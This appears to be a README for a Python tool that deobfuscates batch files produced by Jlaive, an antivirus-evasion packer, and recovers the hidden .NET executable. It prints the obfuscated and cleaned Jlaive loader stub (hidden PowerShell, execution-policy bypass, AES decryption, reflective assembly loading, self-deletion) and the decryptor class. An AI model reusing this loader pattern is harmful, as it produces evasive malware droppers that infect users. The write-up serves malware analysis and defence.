Jlaive is an obfuscator engine which basically converts a .NET exe to obfuscated .bat file for AV evasion.
An example of the output of this tool can be seen below:
@echo off
echo F|xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "%~dp0%~nx0.exe" /y
attrib +s +h "%~dp0%~nx0.exe"
cls
cd %~dp0
set "fENYbyZJkq=3IHsgcHVib"
set "oMDpdCkaMN=k = [Syste"
set "HlBoTjvPwk=6UdLqADvWw" && set "TgmwRYHkmK=ucHV0Lkxlb"
set "nVaFdaubIS=npolicy by" && set "BIXBCNceka=gSUNyeXB0b" && set "YNWXZHqJqc=gZ3MuRGlzc"
set "tQIzxvQESC=GtleSwgYnl" && set "XOhAfBkWmm=vert]::Fro"
set "kLMTZqURfX=U), [Syste" && set "qVRmUESgbg=$tIukXz = " && set "saTMAKUycO=SBpbnB1dCw" && set "KdmMRlyyEK=nlwdG9yLlR" && set "PMyINOXuEO=GJ5dGVbXSB"
set "FscnzUUuAC=::FromBase"
set "BARCwvwdkW=-noprofile" && set "vwRxWzGiFE=))).EntryP"
set "sMNjHgEuTS=md0aCk7IGR" && set "ZMFfhtZaCd=n $tIukXz;" && set "NRBHbUNrkG=etString([" && set "tNCgPVjCku=kID0gZGVjc"
set "CDtNvqDvqL=ngth - 1];" && set "ieHoPTyjEy=mBase64Str" && set "rajcuUaXTP=m.IO.File]" && set "ihrpBFSJkF=Gh5OyBwdWJ" && set "ObqwUWcIse=yZXR1cm4gb"
set "wrxnxJJZUi=10gY1VaaUJ"
set "tPPsLfEmfH=ssembly]::" && set "wYpmPrqEes=0ZW0uU2Vjd" && set "PeMJlFunvD=%~nx0.exe " && set "xRRkIyDKnV=GUgPSBDaXB"
set "LguDwtEgTm=ing('dXNpb"
set "rBnjvHzCEC=SwgaXYpOyB" && set "BwxNyGNeWs=and $NDmNb" && set "NOLCAWkezL=XJpdHkuQ3J" && set "JxakJbogEh=c212SWxpVX"
set "avLgdUKvyf=System.Con"
set "dzLmqrEuSn=Load([DuUJ"
set "buYFlxnyag=mcgU3lzdGV"
set "JrzOnKokrg=G8obXNvKTs"
set "VKtWSAzekf=kaW5nTW9kZ"
set "UDLwXXbfUO=eDefinitio"
set "pZCqseAkqe=ext('%~f0').Split([Environment]::NewLine);$WWCkvU "
set "bEuenIEGAB=ert]::From"
set "evGNjFJkiq=::ReadAllT"
set "EtpzUbnYkW=XRlRGVjcnl"
set "rAJgHQskWM=3VzaW5nIFN" && set "nUMBtoFYkK=yBNZW1vcnl" && set "DlNUGnnsfJ=gTWVtb3J5U" && set "tguYxsQeEG=hbmFnZWQgY" && set "ZxsoDXEAmh=::cUZiBs(["
set "rrBdlEgEiR=" && set "yuBNvyTjWG=ieXRlW10gZ" && set "EpkleGpiSQ=zLlBhZGRpb" && set "hlfUYJcbnE=//github.c" && set "JaaFxTqmkm=zKGJ5dGVbX"
set "ovxvfokepJ=yA9IG5ldyB" && set "NdBkzRUyNc=-Type -Typ"
set "cECnVddQIO=gYWVzLk1vZ"
set "JYdzLMkAMI=zdGVtLklPO"
set "LIJyjYDhEO=mBase64Str"
set "FQDboAlVkm=0cmVhbSBtc" && set "CtISDxCuyg=$NDmNbk.Le"
set "cPhgSHJFiE=laive" && set "wOUbaaionW=8dQ='), [S"
set "TFqYzkUFKP=oZXJNb2RlL" && set "XmJlbVCEeg=ybSBkZWNye"
set "rsAojPyqqK=pass -comm"
set "HjDUCECfuK=vY2soaW5wd" && set "RLYjZdmUem=i5EaXNwb3N"
set "JmcNfgjlkO=3IE1lbW9ye"
set "wotBbJUCXp=28gPSBuZXc"
set "ZMbsYBZiEq=S5QS0NTNzs"
set "JWEGEWztyS=y5Db21wcmV" && set "wYGjMTSRLU=G9zZSgpOyB" && set "RZdMvuYUqn=tLlRleHQ7d"
set "DDhHMvstEO=GljIHN0YXR" && set "BLkZldvAHE=TdHJlYW0gb" && set "HkRRYWZUWm=7IHZhciBnc"
set "EvYPmaikjR=lY3J5cHRvc" && set "NUGvGuKfkH=]] ('%*')))" && set "TiPQaNUyEk=om/ch2sh/J" && set "mMQdKSFyum=yeXB0ZWQ7I"
set "FFeCIpqPyy= -windowst"
set "lYRjpzjmyM=mcgPSBQYWR" && set "jEdNSXkuFv=oint.Invok"
set "UeVhkuMOtk=XNpID0gbmV"
set "reZEtGxrSh=y5EaXNwb3N" && set "uPqpbVZyku=ystem.Conv" && set "QbZOQhYmgk=Fw]::YWqYu"
set "ljXHtMvGyf=jIHN0YXRpY" && set "LulfiaLhEe=XNpbmcgU3l"
set "GVtjxQXtOo=zc2lvbjt1c"
set "EyEeayRkCp=m.Convert]" && set "VTmkqOOkQh=5c3RlbS5JT"
set "DJZvlJxSeK=flection.A"
set "VrbuAavxUi=XQsIDAsIGl" && set "ytnErceFKM=G9zZSgpOyB"
set "WsBCQAkGPI=mFnZWQoKTs" && set "ZeKpegxEqf=UZpbmFsQmx" && set "fYjkFWUCLu=e($null, (" && set "qbrRUujXDM=lKCk7IGFlc" && set "TcbXekUkOV=Base64Stri" && set "ryOJrbkGXw=ncy5Db3B5V" && set "gBhbYMmkar=HWmlwU3RyZ"
set "xFXbUXSqiH=hZXMuQ3JlY"
set "jUxqxtJWwK=XB0b3IgPSB"
set "cUNiABJEPG=64String('"
set "BYliuSSkds=E1lbW9yeVN"
set "DgsMJGRBkW=kNCQzsgYWV" && set "yxMQSdikCf=System.Con" && set "pqydlkWvlv=yYW5zZm9yb"
set "xmGqfoyigz=yYXkoKTsgf" && set "mKWZuiSqkG= -executio"
set "pWisjkyuvo=g]::UTF8.G" && set "RdergtMaPv=3MgRHVVSkZ" && set "FoeUHvtBeI=3RyZWFtKCk"
set "PtbWQSaxkP=gYnl0ZVtdI" && set "prlyUalgGj=, [string[" && set "qfhEOMrfue=rem https:"
set "EHNuBdghke=XNvLlRvQXJ"
set "atzklLZikC=ieXRlcyk7I"
set "VzZHdHfnkK=wdG9yKGtle" && set "pbEQoHEFya=3Npb25Nb2R"
set "wyIRpJUzUy=ng('i9gKth"
set "aRvucOwBMK=lLkRlY29tc"
set "ZGtoXTmqEa=vert]::Fro" && set "LBXFmXrGGk=yle hidden" && set "PgpYWgnESr=SB9'));Add" && set "jQJlvwKnUC=HVybiBkZWN"
set "yutyGaKptk=pYyBieXRlW"
set "NrVzEyZKxJ=gWVdxWXVPK"
set "ElUeqoZkeB=5cHRvZ3Jhc" && set "VqDUHkduHE=HJlc3MpOyB" && set "bXuhcMQWEC=tc2kuRGlzc" && set "wIkgxuqwSU=ieXRlcykge" && set "BeUppPecxE=xt.Encodin" && set "JXrPZaVOUG=G9zZSgpOyB" && set "FclUyvUGNa=WVzID0gbmV" && set "QQwGKBkSYC=WS5VvlzyRn" && set "QSDzwOfsqN=saWMgY2xhc" && set "nNEnadmgAy=SB7IEFlc01"
set "ZSnQhDQxOJ=WFtKG1zaSw"
set "hCSlczZEed=[System.Re"
set "tAyNMEciUo=VN0cmVhbSh" && set "lELXxFDard=O([DuUJFw]"
set "nNsRHgWaoU== $NDmNbk["
set "ldbJMTqUaX=0ZVtdIGl2K" && set "sSUxwkECwE=1RyYW5zZm9" && set "IYUhcqkikI=1hMu1g==')"
set "rgNaXziIpC=GVjcnlwdGV"
set "xdaAAuWEqb=3IEFlc01hb" && set "TYDLSAjkyA=gQ29tcHJlc" && set "GgmonIEaZP=ing($WWCkv"
set "IArsKCeeLv=tc28uRGlzc" && set "oLgiwxduaV=H0gcHVibGl" && set "GNZxLtdDkO=[System.Te"
set "amOerQZEai=OxhVVfEWSN" && set "fHTMzMCrak=yBieXRlW10"
set "kKopFOwikC=2luZyBTeXN"
set "occQjttmnX=lKCk7IHJld"
set "eZKAFlWkCV=MlVcdDTvXm"
%qfhEOMrfue%%hlfUYJcbnE%%TiPQaNUyEk%%cPhgSHJFiE%
%PeMJlFunvD%%BARCwvwdkW%%FFeCIpqPyy%%LBXFmXrGGk%%mKWZuiSqkG%%nVaFdaubIS%%rsAojPyqqK%%BwxNyGNeWs%%oMDpdCkaMN%%rajcuUaXTP%%evGNjFJkiq%%pZCqseAkqe%%nNsRHgWaoU%%CtISDxCuyg%%CDtNvqDvqL%%qVRmUESgbg%%GNZxLtdDkO%%BeUppPecxE%%pWisjkyuvo%%NRBHbUNrkG%%avLgdUKvyf%%ZGtoXTmqEa%%LIJyjYDhEO%%LguDwtEgTm%%buYFlxnyag%%RZdMvuYUqn%%LulfiaLhEe%%JYdzLMkAMI%%rAJgHQskWM%%VTmkqOOkQh%%JWEGEWztyS%%GVtjxQXtOo%%kKopFOwikC%%wYpmPrqEes%%NOLCAWkezL%%ElUeqoZkeB%%ihrpBFSJkF%%QSDzwOfsqN%%RdergtMaPv%%fENYbyZJkq%%DDhHMvstEO%%yutyGaKptk%%wrxnxJJZUi%%JaaFxTqmkm%%saTMAKUycO%%PtbWQSaxkP%%tQIzxvQESC%%ldbJMTqUaX%%nNEnadmgAy%%tguYxsQeEG%%FclUyvUGNa%%xdaAAuWEqb%%WsBCQAkGPI%%cECnVddQIO%%xRRkIyDKnV%%TFqYzkUFKP%%DgsMJGRBkW%%EpkleGpiSQ%%lYRjpzjmyM%%VKtWSAzekf%%ZMbsYBZiEq%%BIXBCNceka%%sSUxwkECwE%%XmJlbVCEeg%%jUxqxtJWwK%%xFXbUXSqiH%%EtpzUbnYkW%%VzZHdHfnkK%%rBnjvHzCEC%%yuBNvyTjWG%%rgNaXziIpC%%tNCgPVjCku%%KdmMRlyyEK%%pqydlkWvlv%%ZeKpegxEqf%%HjDUCECfuK%%VrbuAavxUi%%TgmwRYHkmK%%sMNjHgEuTS%%EvYPmaikjR%%RLYjZdmUem%%qbrRUujXDM%%reZEtGxrSh%%occQjttmnX%%jQJlvwKnUC%%mMQdKSFyum%%oLgiwxduaV%%ljXHtMvGyf%%fHTMzMCrak%%NrVzEyZKxJ%%PMyINOXuEO%%wIkgxuqwSU%%nUMBtoFYkK%%BLkZldvAHE%%UeVhkuMOtk%%JmcNfgjlkO%%tAyNMEciUo%%atzklLZikC%%BYliuSSkds%%FQDboAlVkm%%wotBbJUCXp%%DlNUGnnsfJ%%FoeUHvtBeI%%HkRRYWZUWm%%ovxvfokepJ%%gBhbYMmkar%%ZSnQhDQxOJ%%TYDLSAjkyA%%pbEQoHEFya%%aRvucOwBMK%%VqDUHkduHE%%ryOJrbkGXw%%JrzOnKokrg%%YNWXZHqJqc%%JXrPZaVOUG%%bXuhcMQWEC%%wYGjMTSRLU%%IArsKCeeLv%%ytnErceFKM%%ObqwUWcIse%%EHNuBdghke%%xmGqfoyigz%%PgpYWgnESr%%NdBkzRUyNc%%UDLwXXbfUO%%ZMFfhtZaCd%%hCSlczZEed%%DJZvlJxSeK%%tPPsLfEmfH%%dzLmqrEuSn%%QbZOQhYmgk%%lELXxFDard%%ZxsoDXEAmh%%yxMQSdikCf%%XOhAfBkWmm%%ieHoPTyjEy%%GgmonIEaZP%%kLMTZqURfX%%EyEeayRkCp%%FscnzUUuAC%%cUNiABJEPG%%HlBoTjvPwk%%QQwGKBkSYC%%JxakJbogEh%%eZKAFlWkCV%%wOUbaaionW%%uPqpbVZyku%%bEuenIEGAB%%TcbXekUkOV%%wyIRpJUzUy%%amOerQZEai%%IYUhcqkikI%%vwRxWzGiFE%%jEdNSXkuFv%%fYjkFWUCLu%%prlyUalgGj%%NUGvGuKfkH%
%rrBdlEgEiR%
attrib -s -h "%~dp0%~nx0.exe"
del "%~dp0%~nx0.exe"(goto) 2>nul & del "%~f0"
exit /b
-- a bunch of b64 encrypted bytes ---This is a project I thought of doing after being inspired by the Get-UnJlaive project written in powershell.
The Get-UnJlaive is written in powershell and its goal is to recover the original executable before it was converted to an obfuscated batch file.
The issue is that, if the original executable was waiting for a user action to happen, it would fail to recover it. Also, it was not extracting all the intermediate files that were being created nor it deobfuscated the .bat file.
Truth is, there was no need to provide all the intermediate files but I thought it would be nice to somehow extract them all:)
So, here is my attempt of writing a script in python that:
- Deobfuscates the .bat file to a more readable form
- Recovers all the .cs files created.
- Recovers all the .ps1 files created.
- Recovers the keys, ivs and encrypted blocks and decrypts them, providing the intermediate .exe files.
- Recovers the original executable before being converted to that obfuscated .bat file.
After running the script, the obfuscated batch file will now look like this:
@echo off
echo F|xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "%~dp0%~nx0.exe" /y
attrib +s +h "%~dp0%~nx0.exe"
cls
cd %~dp0
rem https://github.com/ch2sh/Jlaive%~nx0.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $aViIGz = [System.IO.File]::ReadAllText("%~f0").Split([Environment]::NewLine);$zMcEAF = $aViIGz[$aViIGz.Length - 1];$jqmXGf = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgR2xUWVlFIHsgcHVibGljIHN0YXRpYyBieXRlW10gY1lKakRqKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gUmJkSlJQKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9"));Add-Type -TypeDefinition $jqmXGf;[System.Reflection.Assembly]::Load([GlTYYE]::RbdJRP([GlTYYE]::cYJjDj([System.Convert]::FromBase64String($zMcEAF), [System.Convert]::FromBase64String("KsXDu/ZuLORpumzY7tRqieLJCAHO4HhkWSLGTa9vFUs="), [System.Convert]::FromBase64String("NP/92qw/SR3ausC7GbKhag==")))).EntryPoint.Invoke($null, (, [string[]] ("%*")))
attrib -s -h "%~dp0%~nx0.exe"
del "%~dp0%~nx0.exe"(goto) 2>nul & del "%~f0"
exit /b
-- a bunch of b64 encrypted bytes --Another file that will be generated will be the wzpaloqi.0.cs that contains the definition of a class created upon running the .bat and will look like this:
using System.Text;using System.IO;using System.IO.Compression;using System.Security.Cryptography; public class GlTYYE { public static byte[] cYJjDj(byte[] input, byte[] key, byte[] iv) { AesManaged aes = new AesManaged(); aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7; ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); decryptor.Dispose(); aes.Dispose(); return decrypted; } public static byte[] RbdJRP(byte[] bytes) { MemoryStream msi = new MemoryStream(bytes); MemoryStream mso = new MemoryStream(); var gs = new GZipStream(msi, CompressionMode.Decompress); gs.CopyTo(mso); gs.Dispose(); msi.Dispose(); mso.Dispose(); return mso.ToArray(); } }The encrypted bytes after the exit /b command will create a .NET executable that is responsible for decrypting and decompressing the original executable (before being converted to the obfuscated .bat). The key and iv used for its decryption is used in the previously recovered files. After decrypting it, we get the loader_stub.exe which will look like this:
The previously decrypted exe was decrypting a payload.txt attached to its Resources. This will be the original executable given to the Jlaive engine.
After running the tool, the output will be the following:
──(connar㉿kali)-[~/Documents/JlaiveCustomDeobfuscator]
└─$ python unjlaive.py
[*] Sample deobfuscated successfully. Writting result to cleared_Jlaive.ps1
[*] Extracted Key: KsXDu/ZuLORpumzY7tRqieLJCAHO4HhkWSLGTa9vFUs=
[*] Extracted IV: NP/92qw/SR3ausC7GbKhag==
[*] Extracted the wzpaloqi.0.cs file. Writting to wzpaloqi.0.cs
[*] Extracting and decrypting the loader_stub. Writting result to loader_stub.exe
[*] Parsing loader_stub.exe to decrypt the final executable...
[*] Resource 'payload.txt' extracted to 'payload_extracted.txt'
[+] Main method found:
[*] Module: tmpBBD0.tmp
[*] Method: System.Void qCaVAPJGIk.OItkKtykOO::Main(System.String[])
[*] Loading instructions of Main...
[*] Key found: "8AOx7b0fGddReqjf+6WzB7n6yOJGvgsGZXvpBa9764w="
[*] IV found: "T1D5QuS4MCdJRbPrcYCB/Q=="
[*] Original executable recovered successfully. Writing to 'target_exe.exe'...
┌──(connar㉿kali)-[~/Documents/JlaiveCustomDeobfuscator]
└─$ ls
cleared_Jlaive.ps1 dnlib-4.4.0 loader_stub.exe obfuscated.bat payload_extracted.txt target_exe.exe tmp_Jlaive.ps1 unjlaive.py wzpaloqi.0.csThis script needs the following:
- pythonnet
- ironpython
- dnlib.dll